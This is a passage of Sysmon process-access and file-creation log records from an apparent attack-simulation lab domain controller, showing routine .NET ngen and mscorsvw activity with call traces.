C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:29.350","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"4808","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22C1-5F25-0000-001088781100}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 08:07:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8338,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:29.350\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22C1-5F25-0000-001088781100}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:29.350","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22C1-5F25-0000-001088781100}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8339,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:29.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22C1-5F25-0000-001088781100}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:29.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22C1-5F25-0000-001088781100}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8340,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:34.100\r\nProcessGuid: {41C8662E-22C1-5F25-0000-001088781100}\r\nProcessId: 4936\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1348-0\\System.dll\r\nCreationUtcTime: 2020-08-01 08:07:34.100","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:34.100","ProcessGuid":"{41C8662E-22C1-5F25-0000-001088781100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1348-0\\System.dll","CreationUtcTime":"2020-08-01 08:07:34.100","EventReceivedTime":"2020-08-01 08:07:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8341,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:34.475\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 2008\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22C6-5F25-0000-00104C7E1100}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:34.475","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"2008","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22C6-5F25-0000-00104C7E1100}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 08:07:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8342,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:34.475\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22C6-5F25-0000-00104C7E1100}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:34.475","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22C6-5F25-0000-00104C7E1100}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8343,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:34.475\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22C6-5F25-0000-00104C7E1100}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:34.475","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22C6-5F25-0000-00104C7E1100}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8344,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:34.803\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 4808\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22C6-5F25-0000-0010CB811100}\r\nTargetProcessId: 5048\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:34.803","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"4808","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22C6-5F25-0000-0010CB811100}","TargetProcessId":"5048","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 08:07:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8345,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:34.803\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22C6-5F25-0000-0010CB811100}\r\nTargetProcessId: 5048\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 